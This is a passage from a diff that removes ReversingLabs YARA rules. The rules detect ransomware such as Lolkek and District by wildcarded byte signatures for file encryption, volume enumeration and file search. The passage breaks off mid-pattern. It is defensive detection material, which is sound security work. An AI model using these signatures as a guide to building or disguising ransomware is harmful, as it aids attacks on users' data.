-            04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04
-            11 04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 FE 01 13 04 11 04
-            2D ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ??
-            17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 02 7B
-            ?? ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ??
-            ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ??
-            02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ??
-            ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 02
-            7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2A
-        }
-		$unzip_packed_file = {
-            28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 0B 06 07 2E ?? 07 06 28 ?? ?? ?? ?? 2D ?? 14
-            2A 02 73 ?? ?? ?? ?? 0C 16 8D ?? ?? ?? ?? 0D 08 6F ?? ?? ?? ?? 13 04 11 04 20
-            ?? ?? ?? ?? 40 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 68 13 05 08 6F ?? ?? ?? ?? 13 06
-            08 6F ?? ?? ?? ?? 13 07 11 04 20 ?? ?? ?? ?? 33 ?? 11 05 1F 14 33 ?? 11 06 2D
-            ?? 11 07 1E 2E ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ?? ?? 26 08 6F
-            ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 13 08 08 6F ?? ?? ?? ??
-            13 09 08 6F ?? ?? ?? ?? 13 0A 11 09 16 31 ?? 11 09 8D ?? ?? ?? ?? 13 0B 08 11
-            0B 16 11 09 6F ?? ?? ?? ?? 26 11 0A 16 31 ?? 11 0A 8D ?? ?? ?? ?? 13 0C 08 11
-            0C 16 11 0A 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 59 D4 8D ??
-            ?? ?? ?? 13 0D 08 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ?? 26 11 0D 73 ?? ?? ?? ??
-            13 0E 11 08 8D ?? ?? ?? ?? 0D 11 0E 09 16 09 8E 69 6F ?? ?? ?? ?? 26 14 13 0D
-            38 ?? ?? ?? ?? 11 04 1F 18 63 13 0F 11 04 11 0F 1F 18 62 59 13 04 11 04 20 ??
-            ?? ?? ?? 40 ?? ?? ?? ?? 11 0F 17 33 ?? 08 6F ?? ?? ?? ?? 13 10 11 10 8D ?? ??
-            ?? ?? 0D 16 13 11 2B ?? 08 6F ?? ?? ?? ?? 13 12 08 6F ?? ?? ?? ?? 13 13 11 12
-            8D ?? ?? ?? ?? 13 15 08 11 15 16 11 15 8E 69 6F ?? ?? ?? ?? 26 11 15 73 ?? ??
-            ?? ?? 13 14 11 14 09 11 11 11 13 6F ?? ?? ?? ?? 26 11 11 11 13 58 13 11 11 11
-            11 10 32 ?? 11 0F 18 33 ?? 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            13 16 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 17 11 16 11 17 17
-            28 ?? ?? ?? ?? 13 18 11 18 02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 19 11 19 28
-            ?? ?? ?? ?? 0D DE ?? 11 18 2C ?? 11 18 6F ?? ?? ?? ?? DC 11 0F 19 33 ?? 1F 10
-            8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1A 1F 10 8D ?? ?? ?? ?? 25
-            D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1B 11 1A 11 1B 17 28 ?? ?? ?? ?? 13 1C 11 1C
-            02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 1D 11 1D 28 ?? ?? ?? ?? 0D DE 17 11 1C
-            2C ?? 11 1C 6F ?? ?? ?? ?? DC 72 B5 0E 00 70 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ??
-            ?? 14 0C 09 2A
-        }
-		$resolve_assembly = {
-            12 00 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 12 00 16 28 ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 13 11 13 16 1F
-            2C 9D 11 13 6F ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 13 04 16 13 05 16 13 06 16 13 07 2B ??
-            09 11 07 9A 08 28 ?? ?? ?? ?? 2C 0A 09 11 07 17 58 9A 13 04 2B ?? 11 07 18 58 13 07
-            11 07 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 2D ?? 12 00 7B ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 2D ?? 28 ?? ?? ?? ?? 12 00 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 16
-            13 08 2B ?? 09 11 08 9A 08 28 ?? ?? ?? ?? 2C ?? 09 11 08 17 58 9A 13 04 2B ?? 11 08
-            18 58 13 08 11 08 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 11 04
-            16 6F ?? ?? ?? ?? 1F 5B 33 ?? 11 04 1F 5D 6F ?? ?? ?? ?? 13 09 11 04 17 11 09 17 59
-            6F ?? ?? ?? ?? 13 0A 11 0A 1F 7A 6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 05 11 0A 1F 74
-            6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 06 11 04 11 09 17 58 6F ?? ?? ?? ?? 13 04 7E ??
-            ?? ?? ?? 25 13 14 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 04 6F ?? ?? ?? ?? 2C ?? 7E ?? ??
-            ?? ?? 11 04 6F ?? ?? ?? ?? 13 12 DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 6F ?? ?? ?? ??
-            13 0B 11 0B 39 ?? ?? ?? ?? 11 0B 6F ?? ?? ?? ?? 69 13 0C 11 0C 8D ?? ?? ?? ?? 13 0D
-            11 0B 11 0D 16 11 0C 6F ?? ?? ?? ?? 26 11 05 2C ?? 11 0D 28 ?? ?? ?? ?? 13 0D 14 13
-            0E 11 06 2D ?? 11 0D 28 ?? ?? ?? ?? 13 0E DE 0C 26 17 13 06 DE ?? 26 17 13 06 DE ??
-            11 06 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 28 ?? ?? ?? ?? 13 0F 11 0F 28 ?? ??
-            ?? ?? 26 11 0F 12 00 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 10 11 10 28 ??
-            ?? ?? ?? 2D ?? 11 10 28 ?? ?? ?? ?? 13 11 11 11 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ??
-            11 11 6F ?? ?? ?? ?? 11 10 14 1A 28 ?? ?? ?? ?? 26 11 0F 14 1A 28 ?? ?? ?? ?? 26 11
-            10 28 ?? ?? ?? ?? 13 0E DE ?? 26 DE ?? 7E ?? ?? ?? ?? 11 04 11 0E 6F ?? ?? ?? ?? 11
-            0E 13 12 DE ?? DE ?? 11 14 28 ?? ?? ?? ?? DC 14 2A 11 12 2A
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $call_encrypt and $encrypt_files and $start_process ) or ( $msgbox_timer ) or ( $unzip_packed_file and $resolve_assembly ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Lolkek : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Lolkek ransomware."
-		author = "ReversingLabs"
-		id = "441badd6-3708-5f74-90f3-4d3a0fc45aff"
-		date = "2020-10-23"
-		modified = "2020-10-23"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Lolkek.yara#L1-L106"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d18545b25a33bba1a6e01ab37768bd4f15fb125dcb8cbe7909d9a8bbe08e63fa"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Lolkek"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$encrypt_files = {
-            57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99
-            F7 F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF D3 83
-            C4 ?? 56 57 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ??
-            6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99 F7
-            F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 85 FF 0F 85 ?? ?? ?? ?? 5E 5B 33 C0 5F C2
-        }
-		$find_volumes_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56
-            57 E8 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 83 C4 ?? 89 74 24 ?? 33
-        }
-		$find_volumes_p2 = {
-            FF 8B 5C BC ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 9C B4 ?? ?? ?? ?? 46 47 83 FF
-            ?? 7C ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 57 FF 15 ??
-            ?? ?? ?? 8B D8 0F 1F 00 85 F6 74 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 57
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74
-            ?? 4E 57 FF B4 B4 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF
-            D7 33 D2 B9 ?? ?? ?? ?? F7 F1 68 ?? ?? ?? ?? 80 C2 ?? 88 94 34 ?? ?? ?? ?? FF D3 46
-            83 FE ?? 7C ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 15
-        }
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ??
-            8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ??
-            8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57
-            57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ??
-            ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8
-            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ??
-            3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D
-        }
-		$find_files_p2 = {
-            56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ??
-            ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ??
-            75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ??
-            ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2
-            C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_volumes_p* ) ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
-}
-rule REVERSINGLABS_Win32_Ransomware_District : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects District ransomware."
-		author = "ReversingLabs"
-		id = "fc6abbc7-66f9-56e6-8106-5f360f25b092"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.District.yara#L1-L194"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9ce395636fd7719f503726df82998e1ac72e9e80fd7a4534bd2251ac9283af38"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "District"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44
-            24 ?? 8B F1 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44
-            24 ?? ?? ?? ?? ?? 50 8D 45 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC ??
-            C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 33 C9 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 51 8D 45 ?? 66 89 8C 24 ??
-            ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D
-            44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44
-            24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 C7 44 24
-            ?? ?? ?? ?? ?? 50 51 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 66 89 44 24 ?? 8D 4C 24 ??
-            8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56 8D 4C 24 ?? E8 ??
-            ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 57 FF 15 ??
-            ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 66 0F 6E C0 F3 0F E6 C0 C1 E8 ?? F2 0F 58 04 C5
-            ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 56 8B D8
-        }
-		$encrypt_files_p2 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 0F 1F 40 ?? 0F 1F 84 00
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? A3 ?? ?? ?? ?? 8D 44 24 ?? 50 56
-            53 57 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 56 FF 74 24 ?? 8B D3 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? F7 D8 6A
-            ?? 6A ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 56 FF 74 24 ?? 57 FF 15 ?? ??
-            ?? ?? 83 6C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57
-            FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8D 4C 24 ?? 8D 45 ?? 0F 43 4C 24 ?? 83 7D ?? ?? 51
-            0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74
-            24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0
-            C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ??
-            72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66
-            89 44 24 ?? 8B 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24
-            ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 44 24
-            ?? 8B 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF
-            74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 8B
-            45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
-            C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$find_files = {
-            53 55 56 57 6A ?? 8B F1 E8 ?? ?? ?? ?? 83 C4 ?? 8D 9E ?? ?? ?? ?? 8B E8 53 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 53 50 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D BE ?? ?? ??
-            ?? 0F 1F 80 ?? ?? ?? ?? F6 03 ?? 57 74 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 75 ?? 57 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 50 8B CE E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 84 C0 74
-            ?? 8B CE E8 ?? ?? ?? ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 80 7C 24 ?? ?? 75
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D
-            5B C2
-        }
-		$enum_resources_1_p1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 56 57 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24
-            ?? 8B DA 8D 44 24 ?? 89 5C 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
-            50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 3D
-            ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 ED 89
-            6C 24 ?? 39 6C 24 ?? 0F 86 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 DB 0F 8E ?? ?? ?? ?? C1
-            E5 ?? 8B F3 89 6C 24 ?? 89 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 83 BC 2C ?? ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 84 2C ?? ?? ?? ?? 66 83 78 ?? ?? 8D
-            50 ?? 74 ?? 8D B4 24 ?? ?? ?? ?? 8D 48 ?? 8A 01 8D 52 ?? 88 06 8D 76 ?? 66 83 3A
-        }
-		$enum_resources_1_p2 = {
-            8D 49 ?? 75 ?? 8B 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50
-            6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B4 2C ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
